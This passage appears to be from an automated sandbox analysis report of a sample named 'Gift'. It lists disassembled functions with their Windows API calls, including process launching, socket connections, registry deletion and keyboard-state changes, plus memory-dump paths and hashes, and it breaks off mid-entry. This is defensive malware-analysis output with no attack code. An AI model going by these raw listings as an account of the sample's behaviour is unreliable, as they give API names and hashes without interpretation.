                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 3619996494-0
                                                                          • Opcode ID: 4b8858e39419d5ec32fbb0020a5e3130f32f29b5c8565f6a3bc673887f2381c1
                                                                          • Instruction ID: f0e93fc33d6d9b8f338a04fad271079ab663e75ee0058e1cd6bae8fd3405a51e
                                                                          • Opcode Fuzzy Hash: 4b8858e39419d5ec32fbb0020a5e3130f32f29b5c8565f6a3bc673887f2381c1
                                                                          • Instruction Fuzzy Hash: 4C81CF71118200AFC311EB25DC86E6BB7E8EF84714F10891DF9569B3A2DB70ED11CB92
                                                                          Function 002D1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd4cdac7d8df9578fec1606a31c71bf8773f154ee5689ce929f202b54d3ba9fe
                                                                          • Instruction ID: 9f748ace7cb4c0357fda93d16324c534ec7680aac1cfb2e85dfadb6dc79a0b57
                                                                          • Opcode Fuzzy Hash: cd4cdac7d8df9578fec1606a31c71bf8773f154ee5689ce929f202b54d3ba9fe
                                                                          • Instruction Fuzzy Hash: 4C714C30A10109FFDB09CF58CC49AAEBB79FF86314F14815AF915AA291C7709E61DFA0
                                                                          Function 0035B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindow.USER32(013752A0), ref: 0035BA5D
                                                                          • IsWindowEnabled.USER32(013752A0), ref: 0035BA69
                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0035BB4D
                                                                          • SendMessageW.USER32(013752A0,000000B0,?,?), ref: 0035BB84
                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 0035BBC1
                                                                          • GetWindowLongW.USER32(013752A0,000000EC), ref: 0035BBE3
                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0035BBFB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                          • String ID:
                                                                          • API String ID: 4072528602-0
                                                                          • Opcode ID: 599b92493fcb4b91778c973389d6268a6c90f29f5db112c261c5b961a13c4ea9
                                                                          • Instruction ID: c2ea0da0ccf1148370718d4e8a2ee339a9a8b28379e68b53f86310cddb4201da
                                                                          • Opcode Fuzzy Hash: 599b92493fcb4b91778c973389d6268a6c90f29f5db112c261c5b961a13c4ea9
                                                                          • Instruction Fuzzy Hash: D971CA34604205AFEB279F54C895FBAFBB9EF09302F114059ED86972B5CB71AC58CB60
                                                                          Function 0034FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0034FB31
                                                                          • _memset.LIBCMT ref: 0034FBFA
                                                                          • ShellExecuteExW.SHELL32(?), ref: 0034FC3F
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                          • GetProcessId.KERNEL32(00000000), ref: 0034FCB6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0034FCE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                          • String ID: @
                                                                          • API String ID: 3522835683-2766056989
                                                                          • Opcode ID: 39ff4fe58af9111b97977d175c727fd94574ce3ea2c63df7be3325a860fa709b
                                                                          • Instruction ID: 91223aefda805f8455f4362dab54eb3c889509f7b0e4c4317136f8524c0da87d
                                                                          • Opcode Fuzzy Hash: 39ff4fe58af9111b97977d175c727fd94574ce3ea2c63df7be3325a860fa709b
                                                                          • Instruction Fuzzy Hash: B461CC75A10619DFCB16EFA4C8919AEBBF5FF08310F14846AE846AB351CB30AD51CF90
                                                                          Function 0033174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 0033178B
                                                                          • GetKeyboardState.USER32(?), ref: 003317A0
                                                                          • SetKeyboardState.USER32(?), ref: 00331801
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0033182F
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0033184E
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00331894
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003318B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: e26f07138d10a3113b53bbdd99669917664dcc82fee0a76ee6febf92b49b93de
                                                                          • Instruction ID: 8f0393749edae67169a59d9aed751a3b73ae9b1eddf9b35dc2c9167bdd739111
                                                                          • Opcode Fuzzy Hash: e26f07138d10a3113b53bbdd99669917664dcc82fee0a76ee6febf92b49b93de
                                                                          • Instruction Fuzzy Hash: 0251D4A0A087D53DFB374628CC95BBABEE95B06300F0D8989E1D5498D2C3D89C94D760
                                                                          Function 00331565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(00000000), ref: 003315A4
                                                                          • GetKeyboardState.USER32(?), ref: 003315B9
                                                                          • SetKeyboardState.USER32(?), ref: 0033161A
                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00331646
                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00331663
                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003316A7
                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003316C8
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: b5238551eef678bb2265033c8c3d971fa5d90c06ace5dd958bba04d1dc2f3492
                                                                          • Instruction ID: 6de8bc477b01c4ac46a2b14a7fcc43d40dcba7240955c4a2ed87139083f3cc95
                                                                          • Opcode Fuzzy Hash: b5238551eef678bb2265033c8c3d971fa5d90c06ace5dd958bba04d1dc2f3492
                                                                          • Instruction Fuzzy Hash: A15108A06087D53DFB378774CC96BBABEA95F06300F0C8589E5D54A8C3C694EC98E751
                                                                          Function 00335BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$LocalTime
                                                                          • String ID:
                                                                          • API String ID: 2945705084-0
                                                                          • Opcode ID: 8b1839cbf3f7174b43b825748992e1444d7248410855971ebd8e147acfc1e3f5
                                                                          • Instruction ID: bcdfcbaba9a842567c334ca5ce26bd56b80c727bd793eb55db74a96d653d1e69
                                                                          • Opcode Fuzzy Hash: 8b1839cbf3f7174b43b825748992e1444d7248410855971ebd8e147acfc1e3f5
                                                                          • Instruction Fuzzy Hash: 8F419065C7161C75CB12FBB4CC869DFF3B8AF05350F508866EA09E3121E634A329CBA5
                                                                          Function 00333B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00333B8A,?), ref: 00334BE0
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00333B8A,?), ref: 00334BF9
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00333BAA
                                                                          • _wcscmp.LIBCMT ref: 00333BC6
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00333BDE
                                                                          • _wcscat.LIBCMT ref: 00333C26
                                                                          • SHFileOperationW.SHELL32(?), ref: 00333C92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 1377345388-1173974218
                                                                          • Opcode ID: 4f2efd5dea622c0d970c77425d39827c1a98f0b0cfd5c906a2ca4e2d3635812d
                                                                          • Instruction ID: 26ecaed77e8c93bf1ec1da7c2b01fd3cd2ec63165522ca8638dda954838e83f3
                                                                          • Opcode Fuzzy Hash: 4f2efd5dea622c0d970c77425d39827c1a98f0b0cfd5c906a2ca4e2d3635812d
                                                                          • Instruction Fuzzy Hash: 7F419F7140D3449AC757EF64D481AEBB7ECAF89380F50592EF489C71A1EB34D688CB52
                                                                          Function 003578B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003578CF
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00357976
                                                                          • IsMenu.USER32(?), ref: 0035798E
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003579D6
                                                                          • DrawMenuBar.USER32 ref: 003579E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                          • String ID: 0
                                                                          • API String ID: 3866635326-4108050209
                                                                          • Opcode ID: a4ec57a8cbcc19d4c1d3a056c152632a78835cb514d268fbd125ef33f46654b3
                                                                          • Instruction ID: c9623c7dd9904385ee48547062fb0776c57c8cc208e4ff7cad56662531a25956
                                                                          • Opcode Fuzzy Hash: a4ec57a8cbcc19d4c1d3a056c152632a78835cb514d268fbd125ef33f46654b3
                                                                          • Instruction Fuzzy Hash: EA418B70A08208EFDB22DF54E884EAABBF9FF05311F018129ED4597260C770AD54CFA0
                                                                          Function 00351602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00351631
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0035165B
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00351712
                                                                            • Part of subcall function 00351602: RegCloseKey.ADVAPI32(?), ref: 00351678
                                                                            • Part of subcall function 00351602: FreeLibrary.KERNEL32(?), ref: 003516CA
                                                                            • Part of subcall function 00351602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003516ED
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 003516B5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: 976fd725d20fe159d12c4b9952f0ceb769129ac1fa3782cf462665c38deb92c2
                                                                          • Instruction ID: da4e616c5efea970fc1a31aa56d2d262fd9228ca87e04bc46066ce2eef5dcb55
                                                                          • Opcode Fuzzy Hash: 976fd725d20fe159d12c4b9952f0ceb769129ac1fa3782cf462665c38deb92c2
                                                                          • Instruction Fuzzy Hash: C4310DB1901109BFDB169B94DC86EFFB7BCEF08301F044169E912A2150EBB49E499BA0
                                                                          Function 003568F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00356911
                                                                          • GetWindowLongW.USER32(013752A0,000000F0), ref: 00356944
                                                                          • GetWindowLongW.USER32(013752A0,000000F0), ref: 00356979
                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003569AB
                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003569D5
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003569E6
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00356A00
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2178440468-0
                                                                          • Opcode ID: 1d26af039fef44098c733f0ae6ea3a76b0b36b2a7daa3e7f67b8ff1810693354
                                                                          • Instruction ID: 773579fcfd5269fa717ab1f2f012e7e8c5df15690a168df55c2b73b3f0974ad8
                                                                          • Opcode Fuzzy Hash: 1d26af039fef44098c733f0ae6ea3a76b0b36b2a7daa3e7f67b8ff1810693354
                                                                          • Instruction Fuzzy Hash: 2B315A306081509FDB22CF58DC8AF6537E9FB49352F5A41A5F9058F2B2CB72AC44CB50
                                                                          Function 0032E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E2CA
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E2F0
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0032E2F3
                                                                          • SysAllocString.OLEAUT32(?), ref: 0032E311
                                                                          • SysFreeString.OLEAUT32(?), ref: 0032E31A
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0032E33F
                                                                          • SysAllocString.OLEAUT32(?), ref: 0032E34D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 2f870adee76b0034e9a6649de2c7692f3f6ec99776ddf52f32406de09774be87
                                                                          • Instruction ID: 0558a25322331d6aeded6bd03c89ba3f073e3ac14ad9d98ee36dce6c17364e45
                                                                          • Opcode Fuzzy Hash: 2f870adee76b0034e9a6649de2c7692f3f6ec99776ddf52f32406de09774be87
                                                                          • Instruction Fuzzy Hash: 3221A776604219BF9F12DFA8DC89CBF77ACEB09360B458125FA15DB250DAB0EC418B60
                                                                          Function 0034685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00348475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003484A0
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003468B1
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003468C0
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003468F9
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00346902
                                                                          • WSAGetLastError.WSOCK32 ref: 0034690C
                                                                          • closesocket.WSOCK32(00000000), ref: 00346935
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0034694E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 910771015-0
                                                                          • Opcode ID: b5c562a6144cb01bda2dfff85c4882dbc37e1392d3aca86808059de6a7c2065f
                                                                          • Instruction ID: 832d30fbf1976263c24481ce51b54e631c37d00ab7981e4ca6b861d5cd314834
                                                                          • Opcode Fuzzy Hash: b5c562a6144cb01bda2dfff85c4882dbc37e1392d3aca86808059de6a7c2065f
                                                                          • Instruction Fuzzy Hash: 6231B571600214AFDB11AF64CC86BBE77EDEB45725F058019F905AB291CBB4BD048BA2
                                                                          Function 0032E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E3A5
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E3CB
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0032E3CE
                                                                          • SysAllocString.OLEAUT32 ref: 0032E3EF
                                                                          • SysFreeString.OLEAUT32 ref: 0032E3F8
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0032E412
                                                                          • SysAllocString.OLEAUT32(?), ref: 0032E420
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 0bf4d84f1bf6784529ad0ca5cab17dbf929e804e52fb93e86245eb36bde6fb26
                                                                          • Instruction ID: 0ffeb79266113c708f95f953fc16243ec7c8a3762c8a3aee2063de9097c30523
                                                                          • Opcode Fuzzy Hash: 0bf4d84f1bf6784529ad0ca5cab17dbf929e804e52fb93e86245eb36bde6fb26
                                                                          • Instruction Fuzzy Hash: 76219B35604114AFDB15EFB9EC8ACBF77ECEB09360B018125FA05CB260DAB0EC418B64
                                                                          Function 00357BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                            • Part of subcall function 002D2111: GetStockObject.GDI32(00000011), ref: 002D2163
                                                                            • Part of subcall function 002D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00357C57
                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00357C64
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00357C6F
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00357C7E
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00357C8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
